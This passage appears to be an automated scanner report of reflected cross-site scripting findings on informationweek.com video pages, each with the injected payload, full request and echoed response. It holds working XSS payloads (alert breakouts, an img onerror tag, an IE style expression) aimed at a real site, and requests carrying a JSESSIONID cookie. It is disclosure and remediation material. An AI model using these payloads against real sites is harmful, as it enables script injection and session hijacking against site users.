HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:12 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:12 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97600
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=security+/video/security7ecdc</script><a b=c>3b4bf73d484/44865844001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=405952968;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 354f4</script>7ba69ba86af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/354f4</script>7ba69ba86af/68506465001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:35 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:35 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 93129
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/video/354f4</script>7ba69ba86af/68506465001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=440742095;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78039"a%3d"b"c93b787164 was submitted in the REST URL parameter 2. This input was echoed as 78039"a="b"c93b787164 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/78039"a%3d"b"c93b787164/68506465001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:26 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:26 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 93195
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/video/78039"a="b"c93b787164/68506465001;kvarticleid=;kvauthor=;loc=300;grp=291681842" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6880'-alert(1)-'5ca39d54f81 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security/68506465001a6880'-alert(1)-'5ca39d54f81 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:47 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:47 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30661
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... cr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/68506465001a6880'-alert(1)-'5ca39d54f81;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=150464374;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fb9f"%20a%3db%2086febf3773e was submitted in the REST URL parameter 3. This input was echoed as 2fb9f" a=b 86febf3773e in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/security/685064650012fb9f"%20a%3db%2086febf3773e HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:43 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:43 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30621
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/685064650012fb9f" a=b 86febf3773e;kvarticleid=;kvauthor=;loc=300;grp=995365297" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ab6a'-alert(1)-'2bc30409ae0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video9ab6a'-alert(1)-'2bc30409ae0/security/68553969001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:29 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:29 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30697
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video9ab6a'-alert(1)-'2bc30409ae0/security/68553969001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=296498865;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4ae0"><img%20src%3da%20onerror%3dalert(1)>3a38e5627f3 was submitted in the REST URL parameter 1. This input was echoed as d4ae0"><img src=a onerror=alert(1)>3a38e5627f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /videod4ae0"><img%20src%3da%20onerror%3dalert(1)>3a38e5627f3/security/68553969001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:27 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:27 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30823
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/videod4ae0"><img src=a onerror=alert(1)>3a38e5627f3/securi;kvarticleid=;kvauthor=;loc=300;grp=814940346" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91284'-alert(1)-'c844e048bdd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security/6855396900191284'-alert(1)-'c844e048bdd HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:53 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:53 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30661
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... cr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/6855396900191284'-alert(1)-'c844e048bdd;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=993072127;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81e58"><a%20b%3dc>f89a250db91 was submitted in the REST URL parameter 3. This input was echoed as 81e58"><a b=c>f89a250db91 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/security/6855396900181e58"><a%20b%3dc>f89a250db91 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:48 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:48 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30657
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/6855396900181e58"><a b=c>f89a250db91;kvarticleid=;kvauthor=;loc=300;grp=482117926" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff0a5'-alert(1)-'a7b46b4249c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ff0a5'-alert(1)-'a7b46b4249c/security/81784308001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:33 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:33 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30610
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/ff0a5'-alert(1)-'a7b46b4249c/security/81784308001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=85041737;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9058"style%3d"x%3aexpression(alert(1))"68d553d6f34 was submitted in the REST URL parameter 1. This input was echoed as f9058"style="x:expression(alert(1))"68d553d6f34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /f9058"style%3d"x%3aexpression(alert(1))"68d553d6f34/security/81784308001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:31 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:31 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30807
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/f9058"style="x:expression(alert(1))"68d553d6f34/security/8;kvarticleid=;kvauthor=;loc=300;grp=564284099" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45130'-alert(1)-'8c5e548a91a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security45130'-alert(1)-'8c5e548a91a/81784308001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:46 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:46 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 96675
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=security+/video/security45130'-alert(1)-'8c5e548a91a/81784308001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=157966978;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 936f5"%20a%3db%20a194305cb4d was submitted in the REST URL parameter 2. This input was echoed as 936f5" a=b a194305cb4d in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/security936f5"%20a%3db%20a194305cb4d/81784308001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:43 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:43 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 96599
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=security+/video/security936f5" a=b a194305cb4d/81784308001;kvarticleid=;kvauthor=;loc=300;grp=986131323" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87582"><a>d88ea31a30f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/security/8178430800187582"><a>d88ea31a30f HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:52 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:52 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30621
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/8178430800187582"><a>d88ea31a30f;kvarticleid=;kvauthor=;loc=300;grp=305740501" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1f7c</script>f9d4966ec8a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security/81784308001f1f7c</script>f9d4966ec8a HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
